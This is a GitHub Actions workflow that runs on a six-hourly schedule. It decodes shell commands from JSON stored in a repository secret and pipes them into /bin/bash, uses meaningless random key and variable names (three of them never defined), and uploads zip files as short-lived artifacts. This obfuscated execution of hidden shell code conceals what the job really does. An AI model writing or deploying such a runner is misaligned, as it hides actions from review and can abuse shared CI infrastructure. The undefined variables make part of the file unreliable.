name: yuanliangwangnan
on:
  workflow_dispatch:

  schedule:
    - cron: '49 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanliangwangnan
        env:
          n01557: ${{ secrets.n01557 }}
        run: |
          printf '%s' "$n01557" | jq -r .fcr5 | /bin/bash
          printf '%s' "$k273" | jq -r .tsmfj95315 | /bin/bash
          echo $klunj94071 | jq -r .o0 | /bin/bash
          printf '%s' "$usqr96725" | jq -r .tf87 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: L9dRvlVm
          path: "*.zip"
          retention-days: 1
